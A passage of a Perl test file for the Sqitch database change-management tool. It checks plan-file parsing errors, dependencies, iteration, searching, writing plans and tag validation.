is $@->ident, 'parse', 'The SHA1 error ident should be "parse"';
is $@->message, __x(
'Syntax error in {file} at line {lineno}: {error}',
file => $file,
lineno => 4,
error => __x(
'"{name}" is invalid because it could be confused with a SHA1 ID',
name => $sha1,
),
), 'And the SHA1 error message should be correct';
is sorted, 0, 'Should have sorted changes nonce';
# Try a plan with a tag but no change.
$file = file qw(t plans tag-no-change.plan);
$fh = IO::File->new(\"$prags\@foo $tsnp\nbar $tsnp", '<:utf8_strict');
throws_ok { $plan->_parse($file, $fh) } 'App::Sqitch::X',
'Should die on plan with tag but no preceding change';
is $@->ident, 'parse', 'The missing change error ident should be "parse"';
is $@->message, __x(
'Syntax error in {file} at line {lineno}: {error}',
file => $file,
lineno => 4,
error => __x(
'Tag "{tag}" declared without a preceding change',
tag => 'foo',
),
), 'And the missing change error message should be correct';
is sorted, 0, 'Should have sorted changes nonce';
# Try a plan with a duplicate tag name.
$file = file qw(t plans dupe-tag.plan);
$fh = $file->open('<:utf8_strict');
throws_ok { $plan->_parse($file, $fh) } 'App::Sqitch::X',
'Should die on plan with dupe tag';
is $@->ident, 'parse', 'The dupe tag error ident should be "parse"';
is $@->message, __x(
'Syntax error in {file} at line {lineno}: {error}',
file => $file,
lineno => 12,
error => __x(
'Tag "{tag}" duplicates earlier declaration on line {line}',
tag => 'bar',
line => 7,
),
), 'And the missing change error message should be correct';
is sorted, 2, 'Should have sorted changes twice';
# Try a plan with a duplicate change within a tag section.
$file = file qw(t plans dupe-change.plan);
$fh = $file->open('<:utf8_strict');
throws_ok { $plan->_parse($file, $fh) } 'App::Sqitch::X',
'Should die on plan with dupe change';
is $@->ident, 'parse', 'The dupe change error ident should be "parse"';
is $@->message, __x(
'Syntax error in {file} at line {lineno}: {error}',
file => $file,
lineno => 9,
error => __x(
'Change "{change}" duplicates earlier declaration on line {line}',
change => 'greets',
line => 7,
),
), 'And the dupe change error message should be correct';
is sorted, 1, 'Should have sorted changes once';
# Try a plan with an invalid requirement.
$fh = IO::File->new(\"\%project=foo\n\nfoo [^bar] $tsnp", '<:utf8_strict');
throws_ok { $plan->_parse('badreq', $fh ) } 'App::Sqitch::X',
'Should die on invalid dependency';
is $@->ident, 'parse', 'The invalid dependency error ident should be "parse"';
is $@->message, __x(
'Syntax error in {file} at line {lineno}: {error}',
file => 'badreq',
lineno => 3,
error => __x(
'"{dep}" is not a valid dependency specification',
dep => '^bar',
),
), 'And the invalid dependency error message should be correct';
is sorted, 0, 'Should have sorted changes nonce';
# Try a plan with duplicate requirements.
$fh = IO::File->new(\"\%project=foo\n\nfoo [bar baz bar] $tsnp", '<:utf8_strict');
throws_ok { $plan->_parse('dupedep', $fh ) } 'App::Sqitch::X',
'Should die on dupe dependency';
is $@->ident, 'parse', 'The dupe dependency error ident should be "parse"';
is $@->message, __x(
'Syntax error in {file} at line {lineno}: {error}',
file => 'dupedep',
lineno => 3,
error => __x(
'Duplicate dependency "{dep}"',
dep => 'bar',
),
), 'And the dupe dependency error message should be correct';
is sorted, 0, 'Should have sorted changes nonce';
# Try a plan without a timestamp.
$file = file qw(t plans no-timestamp.plan);
$fh = IO::File->new(\"${prags}foo hi <t\@heo.ry>", '<:utf8_strict');
throws_ok { $plan->_parse($file, $fh) } 'App::Sqitch::X',
'Should die on change with no timestamp';
is $@->ident, 'parse', 'The missing timestamp error ident should be "parse"';
is $@->message, __x(
'Syntax error in {file} at line {lineno}: {error}',
file => $file,
lineno => 4,
error => __ 'Missing timestamp',
), 'And the missing timestamp error message should be correct';
is sorted, 0, 'Should have sorted changes nonce';
# Try a plan without a planner.
$file = file qw(t plans no-planner.plan);
$fh = IO::File->new(\"${prags}foo 2012-07-16T23:12:34Z", '<:utf8_strict');
throws_ok { $plan->_parse($file, $fh) } 'App::Sqitch::X',
'Should die on change with no planner';
is $@->ident, 'parse', 'The missing parsener error ident should be "parse"';
is $@->message, __x(
'Syntax error in {file} at line {lineno}: {error}',
file => $file,
lineno => 4,
error => __ 'Missing planner name and email',
), 'And the missing planner error message should be correct';
is sorted, 0, 'Should have sorted changes nonce';
# Try a plan with neither timestamp nor planner.
$file = file qw(t plans no-timestamp-or-planner.plan);
$fh = IO::File->new(\"%project=foo\n\nfoo", '<:utf8_strict');
throws_ok { $plan->_parse($file, $fh) } 'App::Sqitch::X',
'Should die on change with no timestamp or planner';
is $@->ident, 'parse', 'The missing timestamp or parsener error ident should be "parse"';
is $@->message, __x(
'Syntax error in {file} at line {lineno}: {error}',
file => $file,
lineno => 3,
error => __ 'Missing timestamp and planner name and email',
), 'And the missing timestamp or planner error message should be correct';
is sorted, 0, 'Should have sorted changes nonce';
# Try a plan with pragmas.
$file = file qw(t plans pragmas.plan);
$fh = $file->open('<:utf8_strict');
ok $parsed = $plan->_parse($file, $fh),
'Should parse plan with pragmas"';
is sorted, 1, 'Should have sorted changes once';
cmp_deeply delete $parsed->{pragmas}, {
syntax_version => App::Sqitch::Plan::SYNTAX_VERSION,
foo => 'bar',
project => 'pragmata',
uri => 'https://github.com/sqitchers/sqitch/',
strict => 1,
}, 'Should have captured all of the pragmas';
cmp_deeply $parsed, {
changes => [
clear,
change { name => 'hey' },
change { name => 'you' },
],
lines => [
clear,
prag( '', ' ', 'syntax-version', '', '=', '', App::Sqitch::Plan::SYNTAX_VERSION),
prag( ' ', '', 'foo', ' ', '=', ' ', 'bar', ' ', 'lolz'),
prag( '', ' ', 'project', '', '=', '', 'pragmata'),
prag( '', ' ', 'uri', '', '=', '', 'https://github.com/sqitchers/sqitch/'),
prag( '', ' ', 'strict'),
blank(),
change { name => 'hey' },
change { name => 'you' },
blank(),
],
}, 'Should have "multi.plan" lines and changes';
# Try a plan with deploy/revert operators.
$file = file qw(t plans deploy-and-revert.plan);
$fh = $file->open('<:utf8_strict');
ok $parsed = $plan->_parse($file, $fh),
'Should parse plan with deploy and revert operators';
is sorted, 2, 'Should have sorted changes twice';
cmp_deeply delete $parsed->{pragmas}, {
syntax_version => App::Sqitch::Plan::SYNTAX_VERSION,
project => 'deploy_and_revert',
}, 'Should have captured the deploy-and-revert pragmas';
cmp_deeply $parsed, {
changes => [
clear,
change { name => 'hey', op => '+' },
change { name => 'you', op => '+' },
change { name => 'dr_evil', op => '+ ', lspace => ' ' },
tag { name => 'foo' },
change { name => 'this/rocks', op => '+', pspace => ' ' },
change { name => 'hey-there', lspace => ' ' },
change {
name => 'dr_evil',
note => 'revert!',
op => '-',
rspace => ' ',
pspace => ' ',
rtag => [qw(dr_evil)],
},
tag { name => 'bar', lspace => ' ' },
],
lines => [
clear,
version,
prag( '', '', 'project', '', '=', '', 'deploy_and_revert'),
blank,
change { name => 'hey', op => '+' },
change { name => 'you', op => '+' },
change { name => 'dr_evil', op => '+ ', lspace => ' ' },
tag { name => 'foo', ret => 1 },
blank( ' '),
change { name => 'this/rocks', op => '+', pspace => ' ' },
change { name => 'hey-there', lspace => ' ' },
change {
name => 'dr_evil',
note => 'revert!',
op => '-',
rspace => ' ',
pspace => ' ',
rtag => [qw(dr_evil)],
},
tag { name => 'bar', lspace => ' ', ret => 1 },
],
}, 'Should have "deploy-and-revert.plan" lines and changes';
# Try a non-existent plan file with load().
$file = file qw(t hi nonexistent.plan);
$target = App::Sqitch::Target->new(sqitch => $sqitch, plan_file => $file);
throws_ok { App::Sqitch::Plan->new(sqitch => $sqitch, target => $target)->load } 'App::Sqitch::X',
'Should get exception for nonexistent plan file';
is $@->ident, 'plan', 'Nonexistent plan file ident should be "plan"';
is $@->message, __x(
'Plan file {file} does not exist',
file => $file,
), 'Nonexistent plan file message should be correct';
# Try a plan with dependencies.
$file = file qw(t plans dependencies.plan);
$target = App::Sqitch::Target->new(sqitch => $sqitch, plan_file => $file);
isa_ok $plan = App::Sqitch::Plan->new(sqitch => $sqitch, target => $target), $CLASS,
'Plan with sqitch with plan file with dependencies';
is $plan->file, $target->plan_file, 'File should be coopied from Sqitch';
ok $parsed = $plan->load, 'Load plan with dependencies file';
is_deeply $parsed->{changes}, [
clear,
change { name => 'roles', op => '+' },
change { name => 'users', op => '+', pspace => ' ', requires => ['roles'] },
change { name => 'add_user', op => '+', pspace => ' ', requires => [qw(users roles)] },
change { name => 'dr_evil', op => '+' },
tag { name => 'alpha' },
change {
name => 'users',
op => '+',
pspace => ' ',
requires => ['users@alpha'],
rtag => [qw(dr_evil add_user users)],
},
change { name => 'dr_evil', op => '-', rtag => [qw(dr_evil)] },
change {
name => 'del_user',
op => '+',
pspace => ' ',
requires => ['users'],
conflicts => ['dr_evil']
},
], 'The changes should include the dependencies';
is sorted, 2, 'Should have sorted changes twice';
# Try a plan with cross-project dependencies.
$file = file qw(t plans project_deps.plan);
$target = App::Sqitch::Target->new(sqitch => $sqitch, plan_file => $file);
isa_ok $plan = App::Sqitch::Plan->new(sqitch => $sqitch, target => $target), $CLASS,
'Plan with sqitch with plan file with project deps';
is $plan->file, $target->plan_file, 'File should be coopied from Sqitch';
ok $parsed = $plan->load, 'Load plan with project deps file';
is_deeply $parsed->{changes}, [
clear,
change { name => 'roles', op => '+' },
change { name => 'users', op => '+', pspace => ' ', requires => ['roles'] },
change { name => 'add_user', op => '+', pspace => ' ', requires => [qw(users roles log:logger)] },
change { name => 'dr_evil', op => '+' },
tag { name => 'alpha' },
change {
name => 'users',
op => '+',
pspace => ' ',
requires => ['users@alpha'],
rtag => [qw(dr_evil add_user users)],
},
change { name => 'dr_evil', op => '-', rtag => [qw(dr_evil)] },
change {
name => 'del_user',
op => '+',
pspace => ' ',
requires => ['users', 'log:logger@beta1'],
conflicts => ['dr_evil']
},
], 'The changes should include the cross-project deps';
is sorted, 2, 'Should have sorted changes twice';
# Should fail with dependencies on tags.
$file = file qw(t plans tag_dependencies.plan);
$target = App::Sqitch::Target->new(sqitch => $sqitch, plan_file => $file);
$fh = IO::File->new(\"%project=tagdep\n\nfoo $tsnp\n\@bar [:foo] $tsnp", '<:utf8_strict');
isa_ok $plan = App::Sqitch::Plan->new(sqitch => $sqitch, target => $target),
$CLASS, 'Plan with sqitch with plan with tag dependencies';
is $plan->file, $target->plan_file, 'File should be coopied from Sqitch';
throws_ok { $plan->_parse($file, $fh) } 'App::Sqitch::X',
'Should get an exception for tag with dependencies';
is $@->ident, 'parse', 'The tag dependencies error ident should be "plan"';
is $@->message, __x(
'Syntax error in {file} at line {lineno}: {error}',
file => $file,
lineno => 4,
error => __ 'Tags may not specify dependencies',
), 'And the tag dependencies error message should be correct';
# Make sure that lines() loads the plan.
$file = file qw(t plans multi.plan);
$target = App::Sqitch::Target->new(sqitch => $sqitch, plan_file => $file);
isa_ok $plan = App::Sqitch::Plan->new(sqitch => $sqitch, target => $target), $CLASS,
'Plan with sqitch with plan file';
is $plan->file, $target->plan_file, 'File should be coopied from Sqitch';
cmp_deeply [$plan->lines], [
clear,
version,
prag( '', '', 'project', '', '=', '', 'multi'),
blank('', 'This is a note'),
blank(),
blank('', 'And there was a blank line.'),
blank(),
change { name => 'hey', planner_name => 'theory', planner_email => 't@heo.ry' },
change { name => 'you', planner_name => 'anna', planner_email => 'a@n.na' },
tag {
ret => 1,
name => 'foo',
note => 'look, a tag!',
ts => '2012-07-16T17:24:07',
rspace => ' ',
planner_name => 'julie',
planner_email => 'j@ul.ie',
},
blank(' '),
change { name => 'this/rocks', pspace => ' ' },
change { name => 'hey-there', note => 'trailing note!', rspace => ' ' },
tag { name =>, 'bar', ret => 1 },
tag { name => 'baz', ret => 1 },
], 'Lines should be parsed from file';
$vivify = 1;
cmp_deeply [$plan->changes], [
clear,
change { name => 'hey', planner_name => 'theory', planner_email => 't@heo.ry' },
change { name => 'you', planner_name => 'anna', planner_email => 'a@n.na' },
tag {
name => 'foo',
note => 'look, a tag!',
ts => '2012-07-16T17:24:07',
rspace => ' ',
planner_name => 'julie',
planner_email => 'j@ul.ie',
},
change { name => 'this/rocks', pspace => ' ' },
change { name => 'hey-there', note => 'trailing note!', rspace => ' ' },
tag { name =>, 'bar' },
tag { name => 'baz' },
], 'Changes should be parsed from file';
clear;
change { name => 'hey', planner_name => 'theory', planner_email => 't@heo.ry' };
change { name => 'you', planner_name => 'anna', planner_email => 'a@n.na' };
my $foo_tag = tag {
ret => 1,
name => 'foo',
note => 'look, a tag!',
ts => '2012-07-16T17:24:07',
rspace => ' ',
planner_name => 'julie',
planner_email => 'j@ul.ie',
};
change { name => 'this/rocks', pspace => ' ' };
change { name => 'hey-there', rspace => ' ', note => 'trailing note!' };
cmp_deeply [$plan->tags], [
$foo_tag,
tag { name =>, 'bar', ret => 1 },
tag { name => 'baz', ret => 1 },
], 'Should get all tags from tags()';
is sorted, 2, 'Should have sorted changes twice';
ok $parsed = $plan->load, 'Load should parse plan from file';
cmp_deeply delete $parsed->{pragmas}, {
syntax_version => App::Sqitch::Plan::SYNTAX_VERSION,
project => 'multi',
}, 'Should have captured the multi pragmas';
$vivify = 0;
cmp_deeply $parsed, {
lines => [
clear,
version,
prag( '', '', 'project', '', '=', '', 'multi'),
blank('', 'This is a note'),
blank(),
blank('', 'And there was a blank line.'),
blank(),
change { name => 'hey', planner_name => 'theory', planner_email => 't@heo.ry' },
change { name => 'you', planner_name => 'anna', planner_email => 'a@n.na' },
tag {
ret => 1,
name => 'foo',
note => 'look, a tag!',
ts => '2012-07-16T17:24:07',
rspace => ' ',
planner_name => 'julie',
planner_email => 'j@ul.ie',
},
blank(' '),
change { name => 'this/rocks', pspace => ' ' },
change { name => 'hey-there', note => 'trailing note!', rspace => ' ' },
tag { name =>, 'bar', ret => 1 },
tag { name => 'baz', ret => 1 },
],
changes => [
clear,
change { name => 'hey', planner_name => 'theory', planner_email => 't@heo.ry' },
change { name => 'you', planner_name => 'anna', planner_email => 'a@n.na' },
tag {
name => 'foo',
note => 'look, a tag!',
ts => '2012-07-16T17:24:07',
rspace => ' ',
planner_name => 'julie',
planner_email => 'j@ul.ie',
},
change { name => 'this/rocks', pspace => ' ' },
change { name => 'hey-there', note => 'trailing note!', rspace => ' ' },
tag { name =>, 'bar' },
tag { name => 'baz' },
],
}, 'And the parsed file should have lines and changes';
is sorted, 2, 'Should have sorted changes twice';
##############################################################################
# Test the interator interface.
can_ok $plan, qw(
index_of
contains
get
seek
reset
next
current
peek
do
);
is $plan->position, -1, 'Position should start at -1';
is $plan->current, undef, 'Current should be undef';
ok my $change = $plan->next, 'Get next change';
isa_ok $change, 'App::Sqitch::Plan::Change', 'First change';
is $change->name, 'hey', 'It should be the first change';
is $plan->position, 0, 'Position should be at 0';
is $plan->count, 4, 'Count should be 4';
is $plan->current, $change, 'Current should be current';
is $plan->change_at(0), $change, 'Should get first change from change_at(0)';
ok my $next = $plan->peek, 'Peek to next change';
isa_ok $next, 'App::Sqitch::Plan::Change', 'Peeked change';
is $next->name, 'you', 'Peeked change should be second change';
is $plan->last->format_name, 'hey-there', 'last() should return last change';
is $plan->current, $change, 'Current should still be current';
is $plan->peek, $next, 'Peek should still be next';
is $plan->next, $next, 'Next should be the second change';
is $plan->position, 1, 'Position should be at 1';
is $plan->change_at(1), $next, 'Should get second change from change_at(1)';
ok my $third = $plan->peek, 'Peek should return an object';
isa_ok $third, 'App::Sqitch::Plan::Change', 'Third change';
is $third->name, 'this/rocks', 'It should be the foo tag';
is $plan->current, $next, 'Current should be the second change';
is $plan->next, $third, 'Should get third change next';
is $plan->position, 2, 'Position should be at 2';
is $plan->current, $third, 'Current should be third change';
is $plan->change_at(2), $third, 'Should get third change from change_at(1)';
ok my $fourth = $plan->next, 'Get fourth change';
isa_ok $fourth, 'App::Sqitch::Plan::Change', 'Fourth change';
is $fourth->name, 'hey-there', 'Fourth change should be "hey-there"';
is $plan->position, 3, 'Position should be at 3';
is $plan->peek, undef, 'Peek should return undef';
is $plan->next, undef, 'Next should return undef';
is $plan->position, 4, 'Position should be at 7';
is $plan->next, undef, 'Next should still return undef';
is $plan->position, 4, 'Position should still be at 7';
ok $plan->reset, 'Reset the plan';
is $plan->position, -1, 'Position should be back at -1';
is $plan->current, undef, 'Current should still be undef';
is $plan->next, $change, 'Next should return the first change again';
is $plan->position, 0, 'Position should be at 0 again';
is $plan->current, $change, 'Current should be first change';
is $plan->index_of($change->name), 0, "Index of change should be 0";
ok $plan->contains($change->name), 'Plan should contain change';
is $plan->get($change->name), $change, 'Should be able to get change 0 by name';
is $plan->find($change->name), $change, 'Should be able to find change 0 by name';
is $plan->get($change->id), $change, 'Should be able to get change 0 by ID';
is $plan->find($change->id), $change, 'Should be able to find change 0 by ID';
is $plan->index_of('@bar'), 3, 'Index of @bar should be 3';
ok $plan->contains('@bar'), 'Plan should contain @bar';
is $plan->get('@bar'), $fourth, 'Should be able to get hey-there via @bar';
is $plan->get($fourth->id), $fourth, 'Should be able to get hey-there via @bar ID';
is $plan->find('@bar'), $fourth, 'Should be able to find hey-there via @bar';
is $plan->find($fourth->id), $fourth, 'Should be able to find hey-there via @bar ID';
ok $plan->seek('@bar'), 'Seek to the "@bar" change';
is $plan->position, 3, 'Position should be at 3 again';
is $plan->current, $fourth, 'Current should be fourth again';
is $plan->index_of('you'), 1, 'Index of you should be 1';
ok $plan->contains('you'), 'Plan should contain "you"';
is $plan->get('you'), $next, 'Should be able to get change 1 by name';
is $plan->find('you'), $next, 'Should be able to find change 1 by name';
ok $plan->seek('you'), 'Seek to the "you" change';
is $plan->position, 1, 'Position should be at 1 again';
is $plan->current, $next, 'Current should be second again';
is $plan->index_of('baz'), undef, 'Index of baz should be undef';
ok !$plan->contains('baz'), 'Plan should not contain "baz"';
is $plan->index_of('@baz'), 3, 'Index of @baz should be 3';
ok $plan->contains('@baz'), 'Plan should contain @baz';
ok $plan->seek('@baz'), 'Seek to the "baz" change';
is $plan->position, 3, 'Position should be at 3 again';
is $plan->current, $fourth, 'Current should be fourth again';
is $plan->change_at(0), $change, 'Should still get first change from change_at(0)';
is $plan->change_at(1), $next, 'Should still get second change from change_at(1)';
is $plan->change_at(2), $third, 'Should still get third change from change_at(1)';
# Make sure seek() chokes on a bad change name.
throws_ok { $plan->seek('nonesuch') } 'App::Sqitch::X',
'Should die seeking invalid change';
is $@->ident, 'plan', 'Invalid seek change error ident should be "plan"';
is $@->message, __x(
'Cannot find change "{change}" in plan',
change => 'nonesuch',
), 'And the failure message should be correct';
# Get all!
my @changes = ($change, $next, $third, $fourth);
cmp_deeply [$plan->changes], \@changes, 'All should return all changes';
ok $plan->reset, 'Reset the plan again';
$plan->do(sub {
is shift, $changes[0], 'Change ' . $changes[0]->name . ' should be passed to do sub';
is $_, $changes[0], 'Change ' . $changes[0]->name . ' should be the topic in do sub';
shift @changes;
});
# There should be no more to iterate over.
$plan->do(sub { fail 'Should not get anything passed to do()' });
##############################################################################
# Let's try searching changes.
isa_ok my $iter = $plan->search_changes, 'CODE',
'search_changes() should return a code ref';
my $get_all_names = sub {
my $iter = shift;
my @res;
while (my $change = $iter->()) {
push @res => $change->name;
}
return \@res;
};
is_deeply $get_all_names->($iter), [qw(hey you this/rocks hey-there)],
'All the changes should be returned in the proper order';
# Try reverse order.
is_deeply $get_all_names->( $plan->search_changes( direction => 'DESC' ) ),
[qw(hey-there this/rocks you hey)], 'Direction "DESC" should work';
# Try invalid directions.
throws_ok { $plan->search_changes( direction => 'foo' ) } 'App::Sqitch::X',
'Should get error for invalid direction';
is $@->ident, 'DEV', 'Invalid direction error ident should be "DEV"';
is $@->message, 'Search direction must be either "ASC" or "DESC"',
'Invalid direction error message should be correct';
# Try ascending lowercased.
is_deeply $get_all_names->( $plan->search_changes( direction => 'asc' ) ),
[qw(hey you this/rocks hey-there)], 'Direction "asc" should work';
# Try change name.
is_deeply $get_all_names->( $plan->search_changes( name => 'you')),
[qw(you)], 'Search by change name should work';
is_deeply $get_all_names->( $plan->search_changes( name => 'hey')),
[qw(hey hey-there)], 'Search by change name should work as a regex';
is_deeply $get_all_names->( $plan->search_changes( name => '[-/]')),
[qw(this/rocks hey-there)],
'Search by change name should with a character class';
# Try planner name.
is_deeply $get_all_names->( $plan->search_changes( planner => 'Barack' ) ),
[qw(this/rocks hey-there)], 'Search by planner should work';
is_deeply $get_all_names->( $plan->search_changes( planner => 'a..a' ) ),
[qw(you)], 'Search by planner should work as a regex';
# Search by operation.
is_deeply $get_all_names->( $plan->search_changes( operation => 'deploy' ) ),
[qw(hey you this/rocks hey-there)], 'Search by operation "deploy" should work';
is_deeply $get_all_names->( $plan->search_changes( operation => 'revert' ) ),
[], 'Search by operation "rever" should return nothing';
# Fake out an operation.
my $mock_change = Test::MockModule->new('App::Sqitch::Plan::Change');
$mock_change->mock( operator => sub { return shift->name =~ /hey/ ? '-' : '+' });
is_deeply $get_all_names->( $plan->search_changes( operation => 'DEPLOY' ) ),
[qw(you this/rocks)], 'Search by operation "DEPLOY" should now return two changes';
is_deeply $get_all_names->( $plan->search_changes( operation => 'REVERT' ) ),
[qw(hey hey-there)], 'Search by operation "REVERT" should return the other two';
$mock_change->unmock_all;
# Make sure we test only for legal operations.
throws_ok { $plan->search_changes( operation => 'foo' ) } 'App::Sqitch::X',
'Should get an error for unknown operation';
is $@->ident, 'DEV', 'Unknown operation error ident should be "DEV"';
is $@->message, 'Unknown change operation "foo"',
'Unknown operation error message should be correct';
# Test offset and limit.
is_deeply $get_all_names->( $plan->search_changes( offset => 2 ) ),
[qw(this/rocks hey-there)], 'Search with offset 2 should work';
is_deeply $get_all_names->( $plan->search_changes( offset => 2, limit => 1 ) ),
[qw(this/rocks)], 'Search with offset 2, limit 1 should work';
is_deeply $get_all_names->( $plan->search_changes( offset => 3, direction => 'desc' ) ),
[qw(hey)], 'Search with offset 3 and dierction "desc" should work';
is_deeply $get_all_names->( $plan->search_changes( offset => 2, limit => 1, direction => 'desc' ) ),
[qw(you)], 'Search with offset 2, limit 1, dierction "desc" should work';
##############################################################################
# Test writing the plan.
can_ok $plan, 'write_to';
my $to = file 'plan.out';
END { unlink $to }
file_not_exists_ok $to;
ok $plan->write_to($to), 'Write out the file';
file_exists_ok $to;
my $v = App::Sqitch->VERSION;
file_contents_is $to,
'%syntax-version=' . App::Sqitch::Plan::SYNTAX_VERSION . "\n"
. $file->slurp(iomode => '<:utf8_strict'),
'The contents should look right';
# Make sure it will start from a certain point.
ok $plan->write_to($to, 'this/rocks'), 'Write out the file from "this/rocks"';
file_contents_is $to,
'%syntax-version=' . App::Sqitch::Plan::SYNTAX_VERSION . "\n"
. '%project=multi' . "\n"
. '# This is a note' . "\n"
. "\n"
. $plan->find('this/rocks')->as_string . "\n"
. $plan->find('hey-there')->as_string . "\n"
. join( "\n", map { $_->as_string } $plan->find('hey-there')->tags ) . "\n",
'Plan should have been written from "this/rocks" through tags at end';
# Make sure it ends at a certain point.
ok $plan->write_to($to, undef, 'you'), 'Write the file up to "you"';
file_contents_is $to,
'%syntax-version=' . App::Sqitch::Plan::SYNTAX_VERSION . "\n"
. '%project=multi' . "\n"
. '# This is a note' . "\n"
. "\n"
. '# And there was a blank line.' . "\n"
. "\n"
. $plan->find('hey')->as_string . "\n"
. $plan->find('you')->as_string . "\n"
. join( "\n", map { $_->as_string } $plan->find('you')->tags ) . "\n",
'Plan should have been written through "you" and its tags';
# Try both.
ok $plan->write_to($to, '@foo', 'this/rocks'),
'Write from "@foo" to "this/rocks"';
file_contents_is $to,
'%syntax-version=' . App::Sqitch::Plan::SYNTAX_VERSION . "\n"
. '%project=multi' . "\n"
. '# This is a note' . "\n"
. "\n"
. $plan->find('you')->as_string . "\n"
. join( "\n", map { $_->as_string } $plan->find('you')->tags ) . "\n"
. ' ' . "\n"
. $plan->find('this/rocks')->as_string . "\n",
'Plan should have been written from "@foo" to "this/rocks"';
# End with a tag.
ok $plan->write_to($to, 'hey', '@foo'), 'Write from "hey" to "@foo"';
file_contents_is $to,
'%syntax-version=' . App::Sqitch::Plan::SYNTAX_VERSION . "\n"
. '%project=multi' . "\n"
. '# This is a note' . "\n"
. "\n"
. $plan->find('hey')->as_string . "\n"
. $plan->find('you')->as_string . "\n"
. join( "\n", map { $_->as_string } $plan->find('you')->tags ) . "\n",
'Plan should have been written from "hey" through "@foo"';
##############################################################################
# Test _is_valid.
can_ok $plan, '_is_valid';
for my $name (@bad_names) {
throws_ok { $plan->_is_valid( tag => $name) } 'App::Sqitch::X',
qq{Should find "$name" invalid};
is $@->ident, 'plan', qq{Invalid name "$name" error ident should be "plan"};
is $@->message, __x(
qq{"{name}" is invalid: tags must not begin with punctuation, }
. 'contain "@", ":", "#", or blanks, or end in punctuation or digits following punctuation',
name => $name,
), qq{And the "$name" error message should be correct};
}
# Try some valid names.
for my $name (
'foo', # alpha
'12', # digits
't', # char
'6', # digit
'阱阪阬', # multibyte
'foo/bar', # middle punct
'beta1', # ending digit
'v1.2-1', # version number with dash
'v1.2+1', # version number with plus
'v1.2_1', # version number with underscore
) {
local $ENV{FOO} = 1;
my $disp = Encode::encode_utf8($name);
ok $plan->_is_valid(change => $name), qq{Name "$disp" should be valid};
}
##############################################################################
# Try adding a tag.
ok my $tag = $plan->tag( name => 'w00t' ), 'Add tag "w00t"';
is $plan->count, 4, 'Should have 4 changes';
ok $plan->contains('@w00t'), 'Should find "@w00t" in plan';
is $plan->index_of('@w00t'), 3, 'Should find "@w00t" at index 3';
is $plan->last->name, 'hey-there', 'Last change should be "hey-there"';
is_deeply [map { $_->name } $plan->last->tags], [qw(bar baz w00t)],
'The w00t tag should be on the last change';
isa_ok $tag, 'App::Sqitch::Plan::Tag';
is $tag->name, 'w00t', 'The returned tag should be @w00t';
is $tag->change, $plan->last, 'The @w00t change should be the last change';
ok $plan->write_to($to), 'Write out the file again';
file_contents_is $to,
'%syntax-version=' . App::Sqitch::Plan::SYNTAX_VERSION . "\n"
. $file->slurp(iomode => '<:utf8_strict')
. $tag->as_string . "\n",
{ encoding => 'UTF-8' },
'The contents should include the "w00t" tag';
# Try passing the tag name with a leading @.
ok my $tag2 = $plan->tag( name => '@alpha' ), 'Add tag "@alpha"';
ok $plan->contains('@alpha'), 'Should find "@alpha" in plan';
is $plan->index_of('@alpha'), 3, 'Should find "@alpha" at index 3';
is $tag2->name, 'alpha', 'The returned tag should be @alpha';
is $tag2->change, $plan->last, 'The @alpha change should be the last change';
# Try specifying the change to tag.
ok my $tag3 = $plan->tag(name => 'blarney', change => 'you'),
'Tag change "you"';
is $plan->count, 4, 'Should still have 4 changes';
ok $plan->contains('@blarney'), 'Should find "@blarney" in plan';
is $plan->index_of('@blarney'), 1, 'Should find "@blarney" at index 1';
is_deeply [map { $_->name } $plan->change_at(1)->tags], [qw(foo blarney)],
'The blarney tag should be on the second change';
isa_ok $tag3, 'App::Sqitch::Plan::Tag';
is $tag3->name, 'blarney', 'The returned tag should be @blarney';
is $tag3->change, $plan->change_at(1), 'The @blarney change should be the second change';
# Should choke on a duplicate tag.
throws_ok { $plan->tag( name => 'w00t' ) } 'App::Sqitch::X',
'Should get error trying to add duplicate tag';
is $@->ident, 'plan', 'Duplicate tag error ident should be "plan"';
is $@->message, __x(
'Tag "{tag}" already exists',
tag => '@w00t',
), 'And the error message should report it as a dupe';
# Should choke on an invalid tag names.
for my $name (@bad_names, 'foo#bar') {
next if $name =~ /^@/;
throws_ok { $plan->tag( name => $name ) } 'App::Sqitch::X',
qq{Should get error for invalid tag "$name"};
is $@->ident, 'plan', qq{Invalid name "$name" error ident should be "plan"};
is $@->message, __x(
qq{"{name}" is invalid: tags must not begin with punctuation, }
. 'contain "@", ":", "#", or blanks, or end in punctuation or digits following punctuation',
name => $name,
), qq{And the "$name" error message should be correct};
}
# Validate reserved names.
for my $reserved (qw(HEAD ROOT)) {
throws_ok { $plan->tag( name => $reserved ) } 'App::Sqitch::X',
qq{Should get error for reserved tag "$reserved"};
is $@->ident, 'plan', qq{Reserved tag "$reserved" error ident should be "plan"};
is $@->message, __x(
'"{name}" is a reserved name',
name => $reserved,
), qq{And the reserved tag "$reserved" message should be correct};
}
throws_ok { $plan->tag( name => $sha1 ) } 'App::Sqitch::X',
'Should get error for a SHA1 tag';
is $@->ident, 'plan', 'SHA1 tag error ident should be "plan"';
is $@->message, __x(
'"{name}" is invalid because it could be confused with a SHA1 ID',
name => $sha1,,
), 'And the reserved name error should be output';
##############################################################################
# Try adding a change.
ok my $new_change = $plan->add(name => 'booyah', note => 'Hi there'),
'Add change "booyah"';
is $plan->count, 5, 'Should have 5 changes';
ok $plan->contains('booyah'), 'Should find "booyah" in plan';
is $plan->index_of('booyah'), 4, 'Should find "booyah" at index 4';
is $plan->last->name, 'booyah', 'Last change should be "booyah"';
isa_ok $new_change, 'App::Sqitch::Plan::Change';
is $new_change->as_string, join (' ',
'booyah',
$new_change->timestamp->as_string,
$new_change->format_planner,
$new_change->format_note,
), 'Should have plain stringification of "booya"';
my $contents = $file->slurp(iomode => '<:utf8_strict');
$contents =~ s{(\s+this/rocks)}{"\n" . $tag3->as_string . $1}ems;
ok $plan->write_to($to), 'Write out the file again';
file_contents_is $to,
'%syntax-version=' . App::Sqitch::Plan::SYNTAX_VERSION . "\n"
. $contents
. $tag->as_string . "\n"
. $tag2->as_string . "\n\n"
. $new_change->as_string . "\n",
{ encoding => 'UTF-8' },
'The contents should include the "booyah" change';
# Make sure dependencies are verified.
ok $new_change = $plan->add(name => 'blow', requires => ['booyah']),
'Add change "blow"';
is $plan->count, 6, 'Should have 6 changes';
ok $plan->contains('blow'), 'Should find "blow" in plan';
is $plan->index_of('blow'), 5, 'Should find "blow" at index 5';
is $plan->last->name, 'blow', 'Last change should be "blow"';
is $new_change->as_string,
'blow [booyah] ' . $new_change->timestamp->as_string . ' '
. $new_change->format_planner,
'Should have nice stringification of "blow [booyah]"';
is [$plan->lines]->[-1], $new_change,
'The new change should have been appended to the lines, too';
# Make sure dependencies are unique.
